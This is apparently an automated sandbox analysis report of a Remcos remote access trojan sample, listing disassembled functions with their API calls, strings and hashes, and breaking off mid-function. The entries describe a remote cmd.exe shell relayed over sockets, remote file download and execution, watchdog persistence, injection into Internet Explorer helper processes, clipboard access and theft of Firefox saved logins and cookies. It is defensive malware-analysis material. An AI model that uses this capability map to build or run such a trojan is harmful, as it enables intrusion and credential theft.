CreateMutexA.KERNEL32(00000000,00000001,00000000,0040D9AA,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0040BEE6
GetLastError.KERNEL32 ref: 0040BEF1

Strings

Rmc-I7G983, xrefs: 0040BED7

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: CreateErrorLastMutex
String ID: Rmc-I7G983
API String ID: 1925916568-3173645232
Opcode ID: 4eb3972839810b0c92fcd0e84f2da7133f5de43b88e2f45560e7b2e7922c69ac
Instruction ID: f970ec9d0541ab61c93bafde2a4f59c5c821b48a7874ab2150ad5935bc14b509
Opcode Fuzzy Hash: 4eb3972839810b0c92fcd0e84f2da7133f5de43b88e2f45560e7b2e7922c69ac
Instruction Fuzzy Hash: 75D012707083009BD7181774BC8A77D3555E784703F00417AB90FD55E1CB6888409919

Function 00412513 Relevance: 4.5, APIs: 3, Instructions: 42
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
RegCloseKey.KERNEL32(?), ref: 0041255F

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 147e62fc4eb0db3fe2726599cc038d375497f210b40a1d92884617782f01b657
Instruction ID: 155fce86b91483c744b9f02885d56de91ccd1cdd8f33956e2d71fd22bd1c87ae
Opcode Fuzzy Hash: 147e62fc4eb0db3fe2726599cc038d375497f210b40a1d92884617782f01b657
Instruction Fuzzy Hash: F0F08176900118BBCB209BA1ED48DEF7FBDEB44751F004066BA06E2150D6749E55DBA8

Function 004124B7 Relevance: 4.5, APIs: 3, Instructions: 38
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 004124D7
RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 004124F5
RegCloseKey.ADVAPI32(00000000), ref: 00412500

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
Instruction ID: 3c8b5742b91bab9b7a0bfd6479237677f271592d1db5ef4b45a1d16c6b8d7bbd
Opcode Fuzzy Hash: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
Instruction Fuzzy Hash: C0F03A76900208BFDF119FA0AC45FDF7BB9EB04B55F1040A1FA05F6291D670DA54EB98

Function 0089CA5E Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0089CA86
Module32First.KERNEL32(00000000,00000224), ref: 0089CAA6

Memory Dump Source

Source File: 00000000.00000002.1754203056.000000000089C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0089C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_89c000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: ca5706b53926c9574234d8301d86e3c8e158f076e5e068db1a88e7048f9698a3
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 3FF0F6312003297FDB207BF9A88DB6E76E8FF49364F140229E642D10C0DB71EC058A61

Function 02470E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNEL32(00000400,?,?,02470223,?,?), ref: 02470E19
SetErrorMode.KERNEL32(00000000,?,?,02470223,?,?), ref: 02470E1E

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: df7174f9f57e46548dd531f3c2dfcdef14bbfe03a49bac81fa522fe882d0dbf2
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 22D0123114512877D7002A94DC09BCE7B1CDF09B66F008011FB0DD9180C770954046E5

Function 00446AFF Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: dc6ea950822f8571e228d4b4fa6025b1dc9324ca9cf531c4426aa18bd07b2452
Instruction ID: 23017b4f7b15ec8d1e6c8205d578d5100ba2a3a3bb6c043e3f5ab96588fe2cc9
Opcode Fuzzy Hash: dc6ea950822f8571e228d4b4fa6025b1dc9324ca9cf531c4426aa18bd07b2452
Instruction Fuzzy Hash: 16E0E5312002B556FB202A6A9C05F5B7A88DB437A4F160133AC09D62D0CF5CEC4181AF

Function 0089C71D Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 0089C76E

Memory Dump Source

Source File: 00000000.00000002.1754203056.000000000089C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0089C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_89c000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 4ffe6da15b9b5b832c87401acf3945885c8487ceeec746b34bf564fc607c87ee
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: F7112B79A00208EFDB01DF98C985E98BBF5EF08350F0980A4F9489B362D371EA50DF80

Non-executed Functions

Function 00406F06 Relevance: 46.3, APIs: 10, Strings: 16, Instructions: 849filesleepCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 00406F28
GetFileAttributesW.KERNEL32(00000000,00000000,00000000), ref: 00406FF8
DeleteFileW.KERNEL32(00000000), ref: 00407018

Part of subcall function 0041B42F: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B489
Part of subcall function 0041B42F: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B4BB
Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B50C
Part of subcall function 0041B42F: FindClose.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B561
Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B568

Part of subcall function 00404468: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 004044FD

Part of subcall function 00406BE9: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
Part of subcall function 00406BE9: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
Part of subcall function 00406BE9: CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
Part of subcall function 00406BE9: MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD

Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0

Part of subcall function 00404468: WaitForSingleObject.KERNEL32(00000000,00000000,00473D54,?,?,00000004,?,?,00000004,00473EE8,?,?), ref: 0040450E
Part of subcall function 00404468: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,00473EE8,?,?,?,?,?,?,?,00473D54), ref: 0040453C

ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407416
GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004074F5
SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 0040773A
DeleteFileA.KERNEL32(?), ref: 004078CC

Part of subcall function 00407A8C: __EH_prolog.LIBCMT ref: 00407A91
Part of subcall function 00407A8C: FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
Part of subcall function 00407A8C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E

Sleep.KERNEL32(000007D0), ref: 00407976
StrToIntA.SHLWAPI(00000000,00000000), ref: 004079BA

Part of subcall function 0041BB77: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C

Strings

Browsing directory: , xrefs: 004074B6
Failed to download file: , xrefs: 00407321
Downloaded file: , xrefs: 004072A8
x@G, xrefs: 004076A6
V>G, xrefs: 004071C6
x@G, xrefs: 00407563
Downloading file: , xrefs: 004071F3
x@G, xrefs: 00407998
>G, xrefs: 00406F54
x@G, xrefs: 0040705B
Unable to delete: , xrefs: 00407078
H@G, xrefs: 00407473
Unable to rename file!, xrefs: 0040768F
open, xrefs: 00407410
Deleted file: , xrefs: 0040703A
Executing file: , xrefs: 0040742F

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: File$Find$AttributesCloseDeleteDirectoryEventFirstNextRemove$CreateDriveExecuteH_prologHandleInfoLocalLogicalMoveObjectParametersShellSingleSleepStringsSystemTimeWaitWritesend
String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $H@G$Unable to delete: $Unable to rename file!$V>G$open$x@G$x@G$x@G$x@G$>G
API String ID: 2918587301-599666313
Opcode ID: 5cbd65381f93fe68fbffce6a5d4fcea0a8f873c0476c1a977041f3bab2c932fe
Instruction ID: 8a4068a2e00c67808ff4e441dc576a613f01372a1abbdcb91e63f440e0dcd641
Opcode Fuzzy Hash: 5cbd65381f93fe68fbffce6a5d4fcea0a8f873c0476c1a977041f3bab2c932fe
Instruction Fuzzy Hash: 60429371A043005BC614F776C8979AE77A99F90718F40493FF946731E2EE3CAA09C69B

Function 00405042 Relevance: 38.8, APIs: 15, Strings: 7, Instructions: 280pipesleepfileCOMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0040508E

Part of subcall function 004334CF: RtlEnterCriticalSection.KERNEL32(00470D18,00475BF0,00473D54,004017C1,00475BF0,00000000,?,00000000,00475B70,00473EE8,?,00000000,00401913), ref: 004334D9
Part of subcall function 004334CF: RtlLeaveCriticalSection.KERNEL32(00470D18,?,00000000,00401913), ref: 0043350C

Part of subcall function 00404468: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 004044FD

__Init_thread_footer.LIBCMT ref: 004050CB
CreatePipe.KERNEL32(00475CEC,00475CD4,00475BF8,00000000,0046556C,00000000), ref: 0040515E
CreatePipe.KERNEL32(00475CD8,00475CF4,00475BF8,00000000), ref: 00405174
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00475C08,00475CDC), ref: 004051E7

Part of subcall function 00433519: RtlEnterCriticalSection.KERNEL32(00470D18,008E54D8,00475BF0,00473D54,0040179E,00475BF0,?,00000000,00475B70,00473EE8,?,00000000,00401913), ref: 00433524
Part of subcall function 00433519: RtlLeaveCriticalSection.KERNEL32(00470D18,?,00000000,00401913), ref: 00433561

Sleep.KERNEL32(0000012C,00000093,?), ref: 0040523F
PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405264
ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405291

Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB

WriteFile.KERNEL32(00000000,00000000,?,00000000,00473F98,00465570,00000062,00465554), ref: 0040538E
Sleep.KERNEL32(00000064,00000062,00465554), ref: 004053A8
TerminateProcess.KERNEL32(00000000), ref: 004053C1
CloseHandle.KERNEL32 ref: 004053CD
CloseHandle.KERNEL32 ref: 004053D5
CloseHandle.KERNEL32 ref: 004053E7
CloseHandle.KERNEL32 ref: 004053EF

Strings

cmd.exe, xrefs: 004050F5
P\G, xrefs: 00405332
P\G, xrefs: 004052FE
P\G, xrefs: 004053D7
P\G, xrefs: 00405202
SystemDrive, xrefs: 00405109
P\G, xrefs: 00405078

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: CloseCriticalHandleSection$CreatePipe$EnterFileInit_thread_footerLeaveProcessSleep$NamedPeekReadTerminateWrite__onexitsend
String ID: P\G$P\G$P\G$P\G$P\G$SystemDrive$cmd.exe
API String ID: 3815868655-81343324
Opcode ID: f035a51a4368ea9906b830dc8f1d5466bfbed164c4f436bbc398752f5b9b9e0f
Instruction ID: b18bac6d60c4c725a58799f80733fb47b3e4e6a61b1262bf76379e9ec18ff918
Opcode Fuzzy Hash: f035a51a4368ea9906b830dc8f1d5466bfbed164c4f436bbc398752f5b9b9e0f
Instruction Fuzzy Hash: A691E5716007056FD705BB65AC41A6F37A8EB80348F50403FF94ABA1E2EEBC9C448B6D

Function 00410F36 Relevance: 33.5, APIs: 7, Strings: 12, Instructions: 238threadCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00410F45

Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
Part of subcall function 004127D5: RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809

OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410F81
CreateThread.KERNEL32(00000000,00000000,00411637,00000000,00000000,00000000), ref: 00410FE6

Part of subcall function 004124B7: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 004124D7
Part of subcall function 004124B7: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 004124F5
Part of subcall function 004124B7: RegCloseKey.ADVAPI32(00000000), ref: 00412500

CloseHandle.KERNEL32(00000000), ref: 00410F90

Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0

OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041125A

Strings

\system32\, xrefs: 00411044
Remcos restarted by watchdog!, xrefs: 00410F9B
WinDir, xrefs: 00411056, 004110AB
BG, xrefs: 0041101D
\SysWOW64\, xrefs: 0041109C
WDH, xrefs: 00410FF0, 00410FF6, 00411260
svchost.exe, xrefs: 00411100
Watchdog module activated, xrefs: 00410FBF, 00411210
Watchdog launch failed!, xrefs: 004111BE
fsutil.exe, xrefs: 0041114A
0DG, xrefs: 00410F6E
rmclient.exe, xrefs: 00411125

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: CloseOpen$CreateProcessValue$CurrentHandleLocalMutexQueryThreadTime
String ID: 0DG$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$BG
API String ID: 65172268-860466531
Opcode ID: c6fce7a5f256a686047b5678e2bb9a65a85b1b4c4bdf2910b612abd97ad55f4b
Instruction ID: 2ec41641ff7d981187ed77e29e7d519fc89a207972baa733902a05010441332b
Opcode Fuzzy Hash: c6fce7a5f256a686047b5678e2bb9a65a85b1b4c4bdf2910b612abd97ad55f4b
Instruction Fuzzy Hash: 97719E3160420157C614FB32D8579AE77A8AED4718F40053FF582A21F2EF7CAA49869F

Function 0040B335 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 145fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B3B4
FindClose.KERNEL32(00000000), ref: 0040B3CE
FindNextFileA.KERNEL32(00000000,?), ref: 0040B4F1
FindClose.KERNEL32(00000000), ref: 0040B517

Strings

[Firefox StoredLogins not found], xrefs: 0040B3D9
\AppData\Roaming\Mozilla\Firefox\Profiles\, xrefs: 0040B357
\key3.db, xrefs: 0040B47B
UserProfile, xrefs: 0040B365
\logins.json, xrefs: 0040B439
[Firefox StoredLogins Cleared!], xrefs: 0040B504

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Find$CloseFile$FirstNext
String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
API String ID: 1164774033-3681987949
Opcode ID: b345d672035ef2e1036a01464b62a8364430839df8b4b41c38d32e184166bb30
Instruction ID: 89bba1744b34cafda07904381260291e44814ca984bf7dbd554ee600cd7873bd
Opcode Fuzzy Hash: b345d672035ef2e1036a01464b62a8364430839df8b4b41c38d32e184166bb30
Instruction Fuzzy Hash: 4D512C319042195ADB14FBA1EC96AEE7768EF50318F50007FF805B31E2EF389A45CA9D

Function 0041CA9E Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 73windownativeCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_A.USER32(?,00000401,?,?), ref: 0041CAE9
GetCursorPos.USER32(?), ref: 0041CAF8
SetForegroundWindow.USER32(?), ref: 0041CB01
TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041CB1B
Shell_NotifyIcon.SHELL32(00000002,00473B50), ref: 0041CB6C
ExitProcess.KERNEL32 ref: 0041CB74
CreatePopupMenu.USER32 ref: 0041CB7A
AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041CB8F

Strings

Close, xrefs: 0041CB80

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyNtdllProc_ProcessShell_Track
String ID: Close
API String ID: 1665278180-3535843008
Opcode ID: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
Instruction ID: a66ed96c0d91d71762f770de87d5f41dd37c70c4e97b210e23d221b2b7ccacbc
Opcode Fuzzy Hash: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
Instruction Fuzzy Hash: 68212B71188209FFDB064F64FD4EAAA3F65EB04342F044135B906D40B2D7B9EA90EB18

Function 0040B53A Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 130fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B5B2
FindClose.KERNEL32(00000000), ref: 0040B5CC
FindNextFileA.KERNEL32(00000000,?), ref: 0040B68C
FindClose.KERNEL32(00000000), ref: 0040B6B2
FindClose.KERNEL32(00000000), ref: 0040B6D1

Strings

[Firefox cookies found, cleared!], xrefs: 0040B6E0
\AppData\Roaming\Mozilla\Firefox\Profiles\, xrefs: 0040B555
[Firefox Cookies not found], xrefs: 0040B5D7, 0040B69F
\cookies.sqlite, xrefs: 0040B62F
UserProfile, xrefs: 0040B563

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Find$Close$File$FirstNext
String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
API String ID: 3527384056-432212279
Opcode ID: 428b4db06e6ee1f12efa6638976cc43506948391b2d77c59ef0dfd8a310558a4
Instruction ID: 41d59f58487c11b5b23c2ebc8e3123b77d6604a8f5f59a85184e8f88ff1ca84c
Opcode Fuzzy Hash: 428b4db06e6ee1f12efa6638976cc43506948391b2d77c59ef0dfd8a310558a4
Instruction Fuzzy Hash: 65413A319042196ACB14F7A1EC569EE7768EE21318F50017FF801B31E2EF399A458A9E

Function 0040E219 Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 212processCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,?,00474358), ref: 0040E233
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00474358), ref: 0040E25E
Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E27A
Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E2FD
CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E30C

Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
Part of subcall function 004127D5: RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809

CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E371

Strings

C:\Program Files(x86)\Internet Explorer\, xrefs: 0040E3BF
Inj, xrefs: 0040E515
BG, xrefs: 0040E380
ieinstal.exe, xrefs: 0040E3D6
ielowutil.exe, xrefs: 0040E417

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Close$CreateHandleProcess32$FileFirstModuleNameNextSnapshotToolhelp32Value
String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$BG
API String ID: 726551946-3025026198
Opcode ID: 08f4baeccd3cf789efd30d80c49d58d603e1f27663f34837da095a41862f55d9
Instruction ID: ae31f71cb8b9f969ca9e83e5ca698076ed3bac053ed440982de07d1dc4d90588
Opcode Fuzzy Hash: 08f4baeccd3cf789efd30d80c49d58d603e1f27663f34837da095a41862f55d9
Instruction Fuzzy Hash: ED7172311083019BC714FB61D8519EF77A5BF91358F400D3EF986631E2EF38A959CA9A

Function 004159C6 Relevance: 18.1, APIs: 12, Instructions: 80clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 004159C7
EmptyClipboard.USER32 ref: 004159D5
GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004159F5
GlobalLock.KERNEL32(00000000), ref: 004159FE
GlobalUnlock.KERNEL32(00000000), ref: 00415A34
SetClipboardData.USER32(0000000D,00000000), ref: 00415A3D
CloseClipboard.USER32 ref: 00415A5A
OpenClipboard.USER32 ref: 00415A61
GetClipboardData.USER32(0000000D), ref: 00415A71
GlobalLock.KERNEL32(00000000), ref: 00415A7A
GlobalUnlock.KERNEL32(00000000), ref: 00415A83
CloseClipboard.USER32 ref: 00415A89

Part of subcall function 00404468: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 004044FD

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
String ID:
API String ID: 3520204547-0
Opcode ID: 894e55aff36d03aad3d370e3cf3d0e7a357f8046997ae64400356760954c9f95
Instruction ID: b8e523df9fc7c7245f85f50a48877f09888e29e8b5459684195c928b546a98bf
Opcode Fuzzy Hash: 894e55aff36d03aad3d370e3cf3d0e7a357f8046997ae64400356760954c9f95
Instruction Fuzzy Hash: E02183712043009BC714BBB1EC5AAAE76A9AF80752F00453EFD06961E2EF38C845D66A

Function 0248CD05 Relevance: 18.1, APIs: 12, Instructions: 73windownativeCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_A.NTDLL(?,00000401,?,?), ref: 0248CD50
GetCursorPos.USER32(?), ref: 0248CD5F
SetForegroundWindow.USER32(?), ref: 0248CD68
TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0248CD82
Shell_NotifyIcon.SHELL32(00000002,00473B50), ref: 0248CDD3
ExitProcess.KERNEL32 ref: 0248CDDB
CreatePopupMenu.USER32 ref: 0248CDE1
AppendMenuA.USER32(00000000,00000000,00000000,0046C11C), ref: 0248CDF6

Memory Dump Source

